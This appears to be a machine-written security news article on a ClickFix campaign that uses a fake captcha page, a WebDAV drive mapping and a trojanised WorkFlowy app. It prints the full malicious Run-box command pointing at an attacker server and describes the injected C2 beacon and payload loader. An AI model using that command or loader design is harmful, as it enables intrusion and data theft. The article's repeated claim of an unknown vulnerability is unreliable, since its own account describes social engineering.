Ethical Hacking News
A new variant of the popular ClickFix technique has been discovered, exploiting a previously unknown vulnerability in web-based services to deliver a malicious payload. This attack vector leverages "net use" to map a network drive from an external server, after which a ".cmd" batch file is executed. The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside ".asar" archive. Read more about this new variant of the ClickFix technique and its implications for cybersecurity awareness.
The new variant of the ClickFix technique exploits a previously unknown vulnerability in web-based services to deliver a malicious payload. The attack vector leverages the "net use" command to map a network drive from an external server, after which a .cmd batch file is executed. This new variation offers increased stealth and evasion capabilities for threat actors. The initial phase of the attack involves a phishing website posing as a captcha mechanism. The attackers use "net use" to map and connect to a network drive from an external server, bypassing traditional execution engines like PowerShell or mshta. The campaign allows Adversaries high chances to evade defensive controls and stay under the radar of defenders. A malicious code is injected into the WorkFlowy desktop application, which executes a payload with critical functions for exfiltrating host identity and remote payload download.
The cybersecurity landscape is constantly evolving, and threat actors are adapting their tactics to stay one step ahead of defenders. The most recent variant of the popular ClickFix technique has emerged, exploiting a previously unknown vulnerability in web-based services to deliver a malicious payload. This new variation of the attack vector leverages the "net use" command to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside ".asar" archive.
This attack vector was first identified by Atos Researchers, who noticed the unusual behavior of the attackers using "net use" to connect to a remote server, bypassing traditional execution engines like PowerShell or mshta. The team observed that the attackers were using this technique to map a network drive and execute a batch script, which is an uncommon approach in ClickFix attacks. This new variant of the attack vector offers several advantages for threat actors, including increased stealth and evasion capabilities.
The initial phase of the attack involves a phishing website posing as a captcha mechanism – "happyglamper[.]ro". The user is prompted to open the Run application via "Win+R", followed by "Ctrl+V" and "Enter". This executes the command "cmd.exe" /c net use Z: https://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete. Typically, attackers have used PowerShell or mshta to download and execute the next stage of the malware in previous ClickFix campaigns.
However, this new variant uses "net use" to map and connect to a network drive from an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. This campaign gives Adversaries high chances to evade defensive controls and stay under the radar of defenders.
The initial execution script "update.cmd" is loaded from the mapped drive and executed; after that, the mapped drive is removed. The content of "update.cmd" includes a PowerShell instance which downloads a zip archive and extracts it into "%LOCALAPPDATA%\MyApp\" directory. Then it executes "WorkFlowy.exe" binary.
The WorkFlowy desktop application, signed by the developer "FunRoutine Inc.", distributed as an Electron application bundle, contains a malicious code injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive. This injects several critical functions, including:
* Malware executes before the legitimate application starts: The injected IIFE opens with await f() — the infinite C2 beacon loop.
* Persistent victim fingerprinting via %APPDATA%\id.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
* C2 beacon — exfiltrates host identity every 2 seconds: Function u() sends an HTTP POST containing the victim's unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.
* Remote payload download and execution: Function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec.
The ClickFix technique has been widely used by threat actors to deliver malicious payloads. The new variant of this attack vector exploits web-based services to stay one step ahead of defenders. This attack highlights the importance of staying vigilant in the cybersecurity landscape, as threat actors continue to adapt and evolve their tactics.
In conclusion, the recent emergence of a new ClickFix variant is a stark reminder of the constant evolution of threat actors' tactics. By leveraging webDAV and exploiting the "net use" command, attackers can deliver malicious payloads with increased stealth and evasion capabilities. As defenders, it is essential to stay vigilant and adapt to these evolving threats.
Related Information:
https://www.ethicalhackingnews.com/articles/New-ClickFix-Variant-Exploits-WebDAV-to-Deliver-Malicious-Payload-ehn.shtml
https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/
Published: Fri Mar 13 08:44:32 2026 by llama3.2 3B Q4_K_M
